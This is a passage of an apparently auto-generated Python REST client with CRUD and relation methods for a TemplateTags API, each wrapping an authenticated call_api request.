    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_find_one_get(self, **kwargs):
    """
    Find first instance of the model matched by filter from the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_find_one_get(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: TemplateTag
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_find_one_get_with_http_info(**kwargs)
def template_tags_find_one_get_with_http_info(self, **kwargs):
    """
    Find first instance of the model matched by filter from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_find_one_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: TemplateTag
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_find_one_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    resource_path = '/TemplateTags/findOne'.replace('{format}', 'json')
    path_params = {}

    # Optional JSON-encoded 'filter' travels in the query string.
    query_params = {}
    if 'filter' in params:
        query_params['filter'] = params['filter']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TemplateTag',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_get(self, **kwargs):
    """
    Find all instances of the model matched by filter from the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_get(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: list[TemplateTag]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_get_with_http_info(**kwargs)
def template_tags_get_with_http_info(self, **kwargs):
    """
    Find all instances of the model matched by filter from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: list[TemplateTag]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    resource_path = '/TemplateTags'.replace('{format}', 'json')
    path_params = {}

    # Optional JSON-encoded 'filter' travels in the query string.
    query_params = {}
    if 'filter' in params:
        query_params['filter'] = params['filter']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[TemplateTag]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_id_delete(self, id, **kwargs):
    """
    Delete a model instance by {{id}} from the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_delete(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_id_delete_with_http_info(id, **kwargs)
def template_tags_id_delete_with_http_info(self, id, **kwargs):
    """
    Delete a model instance by {{id}} from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    :raises ValueError: if `id` is missing or None.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/id/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_delete`")

    collection_formats = {}

    # '{id}' below is substituted by the api_client from path_params.
    resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='object',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_id_exists_get(self, id, **kwargs):
    """
    Check whether a model instance exists in the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_exists_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: InlineResponse2002
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_id_exists_get_with_http_info(id, **kwargs)
def template_tags_id_exists_get_with_http_info(self, id, **kwargs):
    """
    Check whether a model instance exists in the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_exists_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: InlineResponse2002
        If the method is called asynchronously,
        returns the request thread.
    :raises ValueError: if `id` is missing or None.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/id/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_exists_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_exists_get`")

    collection_formats = {}

    # '{id}' below is substituted by the api_client from path_params.
    resource_path = '/TemplateTags/{id}/exists'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2002',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_id_get(self, id, **kwargs):
    """
    Find a model instance by {{id}} from the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: TemplateTag
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_id_get_with_http_info(id, **kwargs)
def template_tags_id_get_with_http_info(self, id, **kwargs):
    """
    Find a model instance by {{id}} from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: TemplateTag
        If the method is called asynchronously,
        returns the request thread.
    :raises ValueError: if `id` is missing or None.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['id', 'filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/id/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_get`")

    collection_formats = {}

    # '{id}' below is substituted by the api_client from path_params.
    resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']

    # Optional JSON-encoded 'filter' travels in the query string.
    query_params = {}
    if 'filter' in params:
        query_params['filter'] = params['filter']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TemplateTag',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_id_head(self, id, **kwargs):
    """
    Check whether a model instance exists in the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_head(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: InlineResponse2002
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_id_head_with_http_info(id, **kwargs)
def template_tags_id_head_with_http_info(self, id, **kwargs):
    """
    Check whether a model instance exists in the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_head_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: InlineResponse2002
        If the method is called asynchronously,
        returns the request thread.
    :raises ValueError: if `id` is missing or None.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/id/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_head" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_head`")

    collection_formats = {}

    # '{id}' below is substituted by the api_client from path_params.
    resource_path = '/TemplateTags/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'HEAD',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2002',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_id_patch(self, id, **kwargs):
    """
    Patch attributes for a model instance and persist it into the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_id_patch(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: TemplateTag id (required)
    :param TemplateTag data: An object of model property name/value pairs
    :return: TemplateTag
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_id_patch_with_http_info(id, **kwargs)
def template_tags_id_patch_with_http_info(self, id, **kwargs):
    """
    Patch attributes for a model instance and persist it into the data source.

    Synchronous by default; pass a ``callback`` callable to run the request
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param str id: TemplateTag id (required)
    :param TemplateTag data: An object of model property name/value pairs
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag (or the request thread when called asynchronously)
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `id` is None
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('id', 'data', 'callback', '_return_http_data_only')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_patch" % key
            )
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_patch`")

    # Content negotiation; the `Accept` header is omitted entirely when the
    # client selects nothing, `Content-Type` is always sent.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/TemplateTags/{id}'.replace('{format}', 'json'), 'PATCH',
        {'id': id},   # path params
        {},           # query params
        header_params,
        body=kwargs.get('data'),
        post_params=[],
        files={},
        response_type='TemplateTag',
        auth_settings=['access_token'],  # OAuth2 access token
        callback=kwargs.get('callback'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        collection_formats={})
def template_tags_id_put(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.

    Convenience wrapper around ``template_tags_id_put_with_http_info`` that
    forces ``_return_http_data_only=True`` so only the deserialized body is
    returned.  Supplying a ``callback`` kwarg makes the request asynchronous,
    in which case the request thread is returned instead.

    :param str id: Model id (required)
    :param TemplateTag data: Model instance data
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag
    """
    # The generated sync and async branches performed the identical call,
    # so a single delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    return self.template_tags_id_put_with_http_info(id, **kwargs)
def template_tags_id_put_with_http_info(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.

    Synchronous by default; pass a ``callback`` callable to run the request
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param str id: Model id (required)
    :param TemplateTag data: Model instance data
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag (or the request thread when called asynchronously)
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `id` is None
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('id', 'data', 'callback', '_return_http_data_only')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_put" % key
            )
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_put`")

    # Content negotiation; the `Accept` header is omitted entirely when the
    # client selects nothing, `Content-Type` is always sent.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/TemplateTags/{id}'.replace('{format}', 'json'), 'PUT',
        {'id': id},   # path params
        {},           # query params
        header_params,
        body=kwargs.get('data'),
        post_params=[],
        files={},
        response_type='TemplateTag',
        auth_settings=['access_token'],  # OAuth2 access token
        callback=kwargs.get('callback'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        collection_formats={})
def template_tags_id_replace_post(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.

    Convenience wrapper around ``template_tags_id_replace_post_with_http_info``
    that forces ``_return_http_data_only=True`` so only the deserialized body
    is returned.  Supplying a ``callback`` kwarg makes the request
    asynchronous, in which case the request thread is returned instead.

    :param str id: Model id (required)
    :param TemplateTag data: Model instance data
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag
    """
    # The generated sync and async branches performed the identical call,
    # so a single delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    return self.template_tags_id_replace_post_with_http_info(id, **kwargs)
def template_tags_id_replace_post_with_http_info(self, id, **kwargs):
    """
    Replace attributes for a model instance and persist it into the data source.

    Synchronous by default; pass a ``callback`` callable to run the request
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param str id: Model id (required)
    :param TemplateTag data: Model instance data
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag (or the request thread when called asynchronously)
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `id` is None
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('id', 'data', 'callback', '_return_http_data_only')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_replace_post" % key
            )
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_replace_post`")

    # Content negotiation; the `Accept` header is omitted entirely when the
    # client selects nothing, `Content-Type` is always sent.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/TemplateTags/{id}/replace'.replace('{format}', 'json'), 'POST',
        {'id': id},   # path params
        {},           # query params
        header_params,
        body=kwargs.get('data'),
        post_params=[],
        files={},
        response_type='TemplateTag',
        auth_settings=['access_token'],  # OAuth2 access token
        callback=kwargs.get('callback'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        collection_formats={})
def template_tags_id_tag_get(self, id, **kwargs):
    """
    Fetches belongsTo relation tag.

    Convenience wrapper around ``template_tags_id_tag_get_with_http_info``
    that forces ``_return_http_data_only=True`` so only the deserialized body
    is returned.  Supplying a ``callback`` kwarg makes the request
    asynchronous, in which case the request thread is returned instead.

    :param str id: TemplateTag id (required)
    :param bool refresh:
    :param callback function: callable invoked with the response (optional)
    :return: Tag
    """
    # The generated sync and async branches performed the identical call,
    # so a single delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    return self.template_tags_id_tag_get_with_http_info(id, **kwargs)
def template_tags_id_tag_get_with_http_info(self, id, **kwargs):
    """
    Fetches belongsTo relation tag.

    Synchronous by default; pass a ``callback`` callable to run the request
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param str id: TemplateTag id (required)
    :param bool refresh:
    :param callback function: callable invoked with the response (optional)
    :return: Tag (or the request thread when called asynchronously)
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `id` is None
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('id', 'refresh', 'callback', '_return_http_data_only')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_tag_get" % key
            )
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_tag_get`")

    # `refresh` is the only query parameter and is forwarded only when the
    # caller actually supplied it.
    query_params = {}
    if 'refresh' in kwargs:
        query_params['refresh'] = kwargs['refresh']

    # Content negotiation; the `Accept` header is omitted entirely when the
    # client selects nothing, `Content-Type` is always sent.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/TemplateTags/{id}/tag'.replace('{format}', 'json'), 'GET',
        {'id': id},   # path params
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Tag',
        auth_settings=['access_token'],  # OAuth2 access token
        callback=kwargs.get('callback'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        collection_formats={})
def template_tags_id_template_get(self, id, **kwargs):
    """
    Fetches belongsTo relation template.

    Convenience wrapper around ``template_tags_id_template_get_with_http_info``
    that forces ``_return_http_data_only=True`` so only the deserialized body
    is returned.  Supplying a ``callback`` kwarg makes the request
    asynchronous, in which case the request thread is returned instead.

    :param str id: TemplateTag id (required)
    :param bool refresh:
    :param callback function: callable invoked with the response (optional)
    :return: Template
    """
    # The generated sync and async branches performed the identical call,
    # so a single delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    return self.template_tags_id_template_get_with_http_info(id, **kwargs)
def template_tags_id_template_get_with_http_info(self, id, **kwargs):
    """
    Fetches belongsTo relation template.

    Synchronous by default; pass a ``callback`` callable to run the request
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param str id: TemplateTag id (required)
    :param bool refresh:
    :param callback function: callable invoked with the response (optional)
    :return: Template (or the request thread when called asynchronously)
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `id` is None
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('id', 'refresh', 'callback', '_return_http_data_only')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_id_template_get" % key
            )
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `template_tags_id_template_get`")

    # `refresh` is the only query parameter and is forwarded only when the
    # caller actually supplied it.
    query_params = {}
    if 'refresh' in kwargs:
        query_params['refresh'] = kwargs['refresh']

    # Content negotiation; the `Accept` header is omitted entirely when the
    # client selects nothing, `Content-Type` is always sent.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/TemplateTags/{id}/template'.replace('{format}', 'json'), 'GET',
        {'id': id},   # path params
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Template',
        auth_settings=['access_token'],  # OAuth2 access token
        callback=kwargs.get('callback'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        collection_formats={})
def template_tags_post(self, **kwargs):
    """
    Create a new instance of the model and persist it into the data source.

    Convenience wrapper around ``template_tags_post_with_http_info`` that
    forces ``_return_http_data_only=True`` so only the deserialized body is
    returned.  Supplying a ``callback`` kwarg makes the request asynchronous,
    in which case the request thread is returned instead.

    :param TemplateTag data: Model instance data
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag
    """
    # The generated sync and async branches performed the identical call,
    # so a single delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    return self.template_tags_post_with_http_info(**kwargs)
def template_tags_post_with_http_info(self, **kwargs):
    """
    Create a new instance of the model and persist it into the data source.

    Synchronous by default; pass a ``callback`` callable to run the request
    asynchronously, in which case the request thread is returned and the
